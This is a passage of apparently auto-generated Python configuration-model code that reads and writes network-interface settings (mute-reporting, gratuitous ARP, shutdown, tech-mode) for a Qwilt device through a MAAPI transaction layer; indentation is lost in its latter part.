        for logFunc in self._log('has-mutereporting').debug3Func(): logFunc('called. self.muteReportingSet=%s, self.muteReporting=%s', self.muteReportingSet, self.muteReporting)
        if self.muteReportingSet:
            return True
        return False

    def setMuteReporting (self, muteReporting):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-mutereporting').debug3Func(): logFunc('called. muteReporting=%s, old=%s', muteReporting, self.muteReporting)
        self.muteReportingSet = True
        self.muteReporting = muteReporting

    def requestSendGratuitousArp (self, requested):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-sendgratuitousarp').debug3Func(): logFunc('called. requested=%s', requested)
        self.sendGratuitousArpRequested = requested
        self.sendGratuitousArpSet = False

    def isSendGratuitousArpRequested (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('is-sendgratuitousarp-requested').debug3Func(): logFunc('called. requested=%s', self.sendGratuitousArpRequested)
        return self.sendGratuitousArpRequested

    def getSendGratuitousArp (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-sendgratuitousarp').debug3Func(): logFunc('called. self.sendGratuitousArpSet=%s, self.sendGratuitousArp=%s', self.sendGratuitousArpSet, self.sendGratuitousArp)
        if self.sendGratuitousArpSet:
            return self.sendGratuitousArp
        return None

    def hasSendGratuitousArp (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-sendgratuitousarp').debug3Func(): logFunc('called. self.sendGratuitousArpSet=%s, self.sendGratuitousArp=%s', self.sendGratuitousArpSet, self.sendGratuitousArp)
        if self.sendGratuitousArpSet:
            return True
        return False

    def setSendGratuitousArp (self, sendGratuitousArp):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-sendgratuitousarp').debug3Func(): logFunc('called. sendGratuitousArp=%s, old=%s', sendGratuitousArp, self.sendGratuitousArp)
        self.sendGratuitousArpSet = True
        self.sendGratuitousArp = sendGratuitousArp

    def requestShutdown (self, requested):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-shutdown').debug3Func(): logFunc('called. requested=%s', requested)
        self.shutdownRequested = requested
        self.shutdownSet = False

    def isShutdownRequested (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('is-shutdown-requested').debug3Func(): logFunc('called. requested=%s', self.shutdownRequested)
        return self.shutdownRequested

    def getShutdown (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-shutdown').debug3Func(): logFunc('called. self.shutdownSet=%s, self.shutdown=%s', self.shutdownSet, self.shutdown)
        if self.shutdownSet:
            return self.shutdown
        return None

    def hasShutdown (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-shutdown').debug3Func(): logFunc('called. self.shutdownSet=%s, self.shutdown=%s', self.shutdownSet, self.shutdown)
        if self.shutdownSet:
            return True
        return False

    def setShutdown (self, shutdown):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-shutdown').debug3Func(): logFunc('called. shutdown=%s, old=%s', shutdown, self.shutdown)
        self.shutdownSet = True
        self.shutdown = shutdown

    def requestTechMode (self, requested):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('request-techmode').debug3Func(): logFunc('called. requested=%s', requested)
        self.techModeRequested = requested
        self.techModeSet = False

    def isTechModeRequested (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('is-techmode-requested').debug3Func(): logFunc('called. requested=%s', self.techModeRequested)
        return self.techModeRequested

    def getTechMode (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('get-techmode').debug3Func(): logFunc('called. self.techModeSet=%s, self.techMode=%s', self.techModeSet, self.techMode)
        if self.techModeSet:
            return self.techMode
        return None

    def hasTechMode (self):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('has-techmode').debug3Func(): logFunc('called. self.techModeSet=%s, self.techMode=%s', self.techModeSet, self.techMode)
        if self.techModeSet:
            return True
        return False

    def setTechMode (self, techMode):
        self.myInitGuard.isInitOrCrash()
        for logFunc in self._log('set-techmode').debug3Func(): logFunc('called. techMode=%s, old=%s', techMode, self.techMode)
        self.techModeSet = True
        self.techMode = techMode
def _clearAllReadData (self):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')
if self.contentObj:
self.contentObj._clearAllReadData()
if self.connectivityCheckObj:
self.connectivityCheckObj._clearAllReadData()
if self.managementObj:
self.managementObj._clearAllReadData()
if self.linkObj:
self.linkObj._clearAllReadData()
if self.deviceObj:
self.deviceObj._clearAllReadData()
self.configurationDelay = 0
self.configurationDelaySet = False
self.muteReporting = 0
self.muteReportingSet = False
self.sendGratuitousArp = 0
self.sendGratuitousArpSet = False
self.shutdown = 0
self.shutdownSet = False
self.techMode = 0
self.techModeSet = False
def _getSelfKeyPath (self, interface
, junkForTemplate):
for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS, junkForTemplate=%s', junkForTemplate)
keyPath = KeyPath()
xmlVal = Value()
xmlVal.setXmlTag(("system-defaults", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
ancestorVal = Value()
ancestorVal.setString(interface);
keyPath.addKeyPathPrefix(ancestorVal)
xmlVal = Value()
xmlVal.setXmlTag(("interface", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
xmlVal = Value()
xmlVal.setXmlTag(("interfaces", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if"))
keyPath.addKeyPathPrefix(xmlVal)
xmlVal = Value()
xmlVal.setXmlTag(("tech", "http://qwilt.com/ns/yang/device/tech/qwilt-tech", "qt"))
keyPath.addKeyPathPrefix(xmlVal)
for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. PARAMS', keyPath)
return keyPath
def _internalWrite (self,
interface,
trxContext):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('internal-write').debug3Func(): logFunc('called. PARAMS')
tagValueList = TagValues()
res = self._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
itemsToDelete = []
res = self._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
keyPath = self._getSelfKeyPath(interface,
None)
res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')
return ReturnCodes.kOk
def _internalRead (self,
interface,
readAllOrFail,
trxContext):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('internal-read').debug3Func(): logFunc('called. PARAMS, readAllOrFail=%s', readAllOrFail)
if readAllOrFail:
self._clearAllReadData()
tagValueList = TagValues()
res = self._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-fill-read-tag-value-failed').errorFunc(): logFunc('_fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
keyPath = self._getSelfKeyPath(interface,
None)
res = self.domain.readMaapi(tagValueList, keyPath, trxContext)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed. PARAMS')
return ReturnCodes.kGeneralError
res = self._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. PARAMS, readAllOrFail=%s', readAllOrFail)
return ReturnCodes.kOk
def _collectItemsToDelete (self,
interface,
itemsToDelete):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)
if self.contentObj:
res = self.contentObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-content-failed').errorFunc(): logFunc('contentObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.connectivityCheckObj:
res = self.connectivityCheckObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.managementObj:
res = self.managementObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-management-failed').errorFunc(): logFunc('managementObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.linkObj:
res = self.linkObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-link-failed').errorFunc(): logFunc('linkObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
if self.deviceObj:
res = self.deviceObj._collectItemsToDelete(interface,
itemsToDelete)
if res != ReturnCodes.kOk:
for logFunc in self._log('collect-items-to-delete-device-failed').errorFunc(): logFunc('deviceObj._collectItemsToDelete() failed. PARAMS')
return ReturnCodes.kGeneralError
for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)
return ReturnCodes.kOk
def _fillWriteTagValues (self, tagValueList):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)
if self.hasConfigurationDelay():
valConfigurationDelay = Value()
if self.configurationDelay is not None:
valConfigurationDelay.setUint64(self.configurationDelay)
else:
valConfigurationDelay.setEmpty()
tagValueList.push(("configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valConfigurationDelay)
if self.hasMuteReporting():
valMuteReporting = Value()
if self.muteReporting is not None:
valMuteReporting.setBool(self.muteReporting)
else:
valMuteReporting.setEmpty()
tagValueList.push(("mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valMuteReporting)
if self.hasSendGratuitousArp():
valSendGratuitousArp = Value()
if self.sendGratuitousArp is not None:
valSendGratuitousArp.setBool(self.sendGratuitousArp)
else:
valSendGratuitousArp.setEmpty()
tagValueList.push(("send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valSendGratuitousArp)
if self.hasShutdown():
valShutdown = Value()
if self.shutdown is not None:
valShutdown.setBool(self.shutdown)
else:
valShutdown.setEmpty()
tagValueList.push(("shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valShutdown)
if self.hasTechMode():
valTechMode = Value()
if self.techMode is not None:
valTechMode.setBool(self.techMode)
else:
valTechMode.setEmpty()
tagValueList.push(("tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valTechMode)
if self.contentObj:
valBegin = Value()
(tag, ns, prefix) = ("content" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.contentObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-content-failed').errorFunc(): logFunc('contentObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.connectivityCheckObj:
valBegin = Value()
(tag, ns, prefix) = ("connectivity-check" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.connectivityCheckObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.managementObj:
valBegin = Value()
(tag, ns, prefix) = ("management" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.managementObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-management-failed').errorFunc(): logFunc('managementObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.linkObj:
valBegin = Value()
(tag, ns, prefix) = ("link" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.linkObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-link-failed').errorFunc(): logFunc('linkObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.deviceObj:
valBegin = Value()
(tag, ns, prefix) = ("device" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.deviceObj._fillWriteTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-write-tag-values-device-failed').errorFunc(): logFunc('deviceObj._fillWriteTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
return ReturnCodes.kOk
def _fillReadTagValues (self, tagValueList):
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)
if self.isConfigurationDelayRequested():
valConfigurationDelay = Value()
valConfigurationDelay.setEmpty()
tagValueList.push(("configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valConfigurationDelay)
if self.isMuteReportingRequested():
valMuteReporting = Value()
valMuteReporting.setEmpty()
tagValueList.push(("mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valMuteReporting)
if self.isSendGratuitousArpRequested():
valSendGratuitousArp = Value()
valSendGratuitousArp.setEmpty()
tagValueList.push(("send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valSendGratuitousArp)
if self.isShutdownRequested():
valShutdown = Value()
valShutdown.setEmpty()
tagValueList.push(("shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valShutdown)
if self.isTechModeRequested():
valTechMode = Value()
valTechMode.setEmpty()
tagValueList.push(("tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"), valTechMode)
if self.contentObj:
valBegin = Value()
(tag, ns, prefix) = ("content" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.contentObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-content-failed').errorFunc(): logFunc('contentObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.connectivityCheckObj:
valBegin = Value()
(tag, ns, prefix) = ("connectivity-check" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.connectivityCheckObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.managementObj:
valBegin = Value()
(tag, ns, prefix) = ("management" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.managementObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-management-failed').errorFunc(): logFunc('managementObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.linkObj:
valBegin = Value()
(tag, ns, prefix) = ("link" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.linkObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-link-failed').errorFunc(): logFunc('linkObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
if self.deviceObj:
valBegin = Value()
(tag, ns, prefix) = ("device" , "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", "qt-if")
valBegin.setXmlBegin((tag, ns, prefix))
tagValueList.push((tag, ns), valBegin)
tagValueListLen = tagValueList.getLen()
res = self.deviceObj._fillReadTagValues(tagValueList)
if res != ReturnCodes.kOk:
for logFunc in self._log('fill-read-tag-values-device-failed').errorFunc(): logFunc('deviceObj._fillReadTagValues() failed. PARAMS')
return ReturnCodes.kGeneralError
if tagValueList.getLen() == tagValueListLen:
# descendant didn't add anything, no need to read it.
tagValueList.pop()
else:
valEnd = Value()
valEnd.setXmlEnd((tag, ns, prefix))
tagValueList.push((tag, ns), valEnd)
return ReturnCodes.kOk
def _readTagValues (self, tagValueList, readAllOrFail):
__pychecker__ = 'maxlines=300'
__pychecker__ = 'maxreturns=30'
self.myInitGuard.isInitOrCrash()
for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)
res = ReturnCodes.kOk
for logFunc in self._log('read-tag-values-leaves').debug3Func(): logFunc('reading leaves. tagValueList=%s', tagValueList)
if self.isConfigurationDelayRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "configuration-delay") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-configurationdelay').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"configurationDelay", "configuration-delay", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asUint64()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-configuration-delay-bad-value').infoFunc(): logFunc('configurationDelay not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setConfigurationDelay(tempVar)
for logFunc in self._log('read-tag-values-configuration-delay').debug3Func(): logFunc('read configurationDelay. configurationDelay=%s, tempValue=%s', self.configurationDelay, tempValue.getType())
if self.isMuteReportingRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "mute-reporting") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-mutereporting').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"muteReporting", "mute-reporting", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-mute-reporting-bad-value').infoFunc(): logFunc('muteReporting not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setMuteReporting(tempVar)
for logFunc in self._log('read-tag-values-mute-reporting').debug3Func(): logFunc('read muteReporting. muteReporting=%s, tempValue=%s', self.muteReporting, tempValue.getType())
if self.isSendGratuitousArpRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "send-gratuitous-arp") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-sendgratuitousarp').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"sendGratuitousArp", "send-gratuitous-arp", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-send-gratuitous-arp-bad-value').infoFunc(): logFunc('sendGratuitousArp not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setSendGratuitousArp(tempVar)
for logFunc in self._log('read-tag-values-send-gratuitous-arp').debug3Func(): logFunc('read sendGratuitousArp. sendGratuitousArp=%s, tempValue=%s', self.sendGratuitousArp, tempValue.getType())
if self.isShutdownRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "shutdown") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-shutdown').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"shutdown", "shutdown", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-shutdown-bad-value').infoFunc(): logFunc('shutdown not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setShutdown(tempVar)
for logFunc in self._log('read-tag-values-shutdown').debug3Func(): logFunc('read shutdown. shutdown=%s, tempValue=%s', self.shutdown, tempValue.getType())
if self.isTechModeRequested():
((tag, ns), tempValue) = tagValueList.popFront()
if (tag != "tech-mode") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"):
for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-techmode').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',
"techMode", "tech-mode", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", tag, ns)
self._clearAllReadData()
return ReturnCodes.kGeneralError
tempVar = None
tempVar = tempValue.asBool()
if res != ReturnCodes.kOk or tempVar is None:
for logFunc in self._log('read-tag-values-tech-mode-bad-value').infoFunc(): logFunc('techMode not read')
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
if tempVar is not None:
self.setTechMode(tempVar)
for logFunc in self._log('read-tag-values-tech-mode').debug3Func(): logFunc('read techMode. techMode=%s, tempValue=%s', self.techMode, tempValue.getType())
if self.contentObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "content") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"content", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.contentObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-content-failed').errorFunc(): logFunc('contentObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "content") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"content", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.connectivityCheckObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "connectivity-check") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"connectivity-check", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.connectivityCheckObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-connectivity-check-failed').errorFunc(): logFunc('connectivityCheckObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "connectivity-check") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"connectivity-check", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.managementObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "management") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"management", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.managementObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-management-failed').errorFunc(): logFunc('managementObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "management") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"management", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.linkObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "link") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
